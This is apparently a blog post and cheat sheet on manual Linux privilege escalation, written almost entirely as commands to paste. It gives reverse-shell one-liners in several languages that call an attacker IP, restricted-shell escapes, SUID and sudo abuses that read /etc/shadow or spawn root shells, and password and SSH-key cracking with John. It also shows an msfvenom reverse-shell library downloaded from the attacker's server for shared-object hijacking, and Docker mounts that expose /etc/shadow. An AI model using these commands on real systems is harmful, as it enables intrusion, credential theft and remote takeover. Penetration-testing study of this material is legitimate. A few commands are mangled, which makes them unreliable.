Linux Manual Escalation
Introduction
In this blog post we will discuss some approaches in order to escalate our privileges. I recommend learning this technique in-depth to use this in future
Bypassing restricted shell
Suppose you got successful access to the target system but you’re unable to execute some commands on it, its restricted to do so.
Some basic approaches to bypass restricted shell and get fully interactive system shell and these techniques also can be used to escalate privileges from user to root(depends on target system configuration).
Using python
python3 -c "import pty;pty.spawn('/bin/sh');"
python3 -c 'import os; os.system("/bin/sh");'
It can also give you root privileges if python executes as root.
Using vi
vi
:set shell=/bin/sh
:shell
Using ed
ed
! '/bin/sh'
Using Perl
perl -e 'system("/bin/sh");'
Using awk
awk 'BEGIN {system("/bin/sh")}'
TTY shell
echo os.system('/bin/bash')
/bin/sh –i
execute('/bin/sh')
If you allowed executing nc, php, ruby, perl you can take reverse shell from there.
Start listener in your attacker machine
# nc -nlvp 1337
Start reverse shell on the target
Bash Reverse shell
bash -i >& /dev/tcp/ATTACKING-IP/1337 0>&1
PHP Reverse Shell
php -r '$sock=fsockopen("ATTACKING-IP",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)
Netcat Reverse Shell
nc -e /bin/sh ATTACKING-IP 1337
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 1337 0/tmp/p
Telnet Reverse Shell
telnet ATTACKING-IP 1337 | /bin/bash | telnet ATTACKING-IP 1337
Perl Reverse Shell
perl -e 'use Socket;$i="ATTACKING-IP";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
SUID/SGID binaries Privilege escalation
SUID and SGID (short for “set user ID” and “set group ID”) are Unix access rights flags that allow users to run an executable with the permissions of the executable’s owner or group respectively and to change behavior in directories. They are often used to allow users on a computer system to run programs with temporarily elevated privileges to perform a specific task. While the assumed user id or group id privileges provided are not always elevated, at a minimum they are specific.
Using below command we can list SUID files
find / -perm -4000 -type f 2>/dev/null
Exploiting common SUID’s
GREP To read data from a file
file = /etc/shadow
grep '' $file
Nmap To spawn system shell
nmap --interactive
nmap> !sh
apt-get To spawn root shell
apt-get changelog apt
!/bin/sh
Find To spawn root shell
find . -exec /bin/sh \; -quit
Nano
nano
<ctrl + R> <ctrl + X>
reset; sh 1>&0 2>0
Sudo Permissions
Sudo provides system permissions to users on a temporary basis to allow users to run commands as root.
All sudoers can be found in /etc/sudoers file
To check sudo permission or status for the current user
sudo -l
The output will show us what can user do by sudo.
Sudo Privilege Escalation
less
sudo less /etc/shadow
!sh
more
sudo more /etc/shadow
!sh
gdb
sudo gdb <anyfile>
!sh
man
sudo man -P "cat /etc/shadow" man
Cracking Shadow and other hashes
Shadow hash
Shadow use SHA512 identify by $6$, SHA256 identify by $5$ , MD5 identify by $1$
crack shadow
$ unshadow /etc/passwd_file /etc/shadowfile > unshadow.john
$ john unshadow.john --wordlist=/usr/share/wordlists/rockyou.txt
You can also add your custom wordlist
crack ssh key
ssh2john.py encrytedkey > key.john
$ john key.john --wordlist=/usr/share/wordlists/rockyou.txt
base64
echo 'hash' | base64 -d
To identify hash
hashid <filename>
To check md5 hash of a file
md5sum <filename>
You can use john to crack almost anything.
Using post enumeration information we can also search for kernel exploits, service exploits and also check metasploit modules
We can also check for Buffer Overflow, PATH hijacking (strace/ltrace, ldd, strings to see if the binary is executing something more, ex: ls, without /bin), check strace Shared Object (.so) injection
To know about Static Libraries(a) and Dynamically Linked Shared Object Libraries(.so) click here
Absuing Shared object libraries
binaries that have SUID or SUDO permissions
To see the shared objects being loaded by the /usr/local/bin/
$ ldd /usr/local/bin/program_name
To see the Runpath and Rpath options in binary we will use ‘objdump’
$ objdump /usr/local/bin/program_name | grep RPATH
$ objdump /usr/local/bin/program_name | grep RUNPATH
After this, we will get RPATH and RUNPATH pointing directories
Assuming
/tmp/program/libs
In that directory, we can place our malicious hacker.so(shared object file) file.
Hijacking shared object
Create .so file using msfvenom
msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=<attacker IP> \
LPORT=<attacker LPORT> -f elf-so -o program_name.so
Start python server in attacker machine where our malicious hacker.so the file is located
python -m SimpleHTTPServer 80
On target system
cd /tmp/program/libs && wget http://AtackerIP/program_name.so
Start multi handler in attacker system
use exploit/multi/handler
exploit(multi/handler) > set payload linux/x64/shell_reverse_tcp
exploit(multi/handler) > set LHOST <attackerIp>
exploit(multi/handler) > set LPORT <attackerLport>
exploit(multi/handler) > exploit -j
Exploit running as background job 0.
And execute vulnerable binary in the target system and you will get a meterpreter shell in your attacker system
Like this, we can also exploit wildcard injection if its a binary like /usr/bin/program_name /var/*
we can put our malicious file in next to /var/ path and can get easily reverse shell as root if the binary is running in root permission or on a cronjob.
Abusing LD_PRELOAD and LD_LIBRARY_PATH LD_PRELOAD and LD_LIBRARY_PATH are environment variables. LD_PRELOAD allows indicating an additional directory to search for libraries and the LD_PRELOAD library which will be loaded before any other library when the program gets executed.
LD_PRELOAD will load malicious .so file prior when the program gets executed.
LD_PRELOAD=/tmp/hacker/hackerfile.so /usr/bin/programe_name
LD_LIBRARY_PATH will add the directory to search for libraries
export LD_LIBRARY_PATH=/tmp/hacker/
Now if we execute the program it will load our malicious shared object file and perform our desired action
I just introduce some basic binary exploitation techniques, I will cover beginner to intermediate level of this topic in my upcoming exploit development blog series
Docker privilege escalation
If we found docker is running in previous phases, we can easily use it to escalate privileges
docker run -v /etc/shadow:/docker/hashedpasswords -d postgres
cat /docker/hashedpasswords > /docker/cleanpswd.txt
chmod 777 /docker/cleanpswd.txt
cat /docker/cleanpswd.txt
docker exec -it <CONTAINER_ID> /bin/bash
docker run -v /root:/mnt it <CONTAINER_ID>
Conclusion
We have discussed Linux manual privilege escalation techniques in this blog post, revise them if you’re stuck in any topic, please do google to clear your doubts.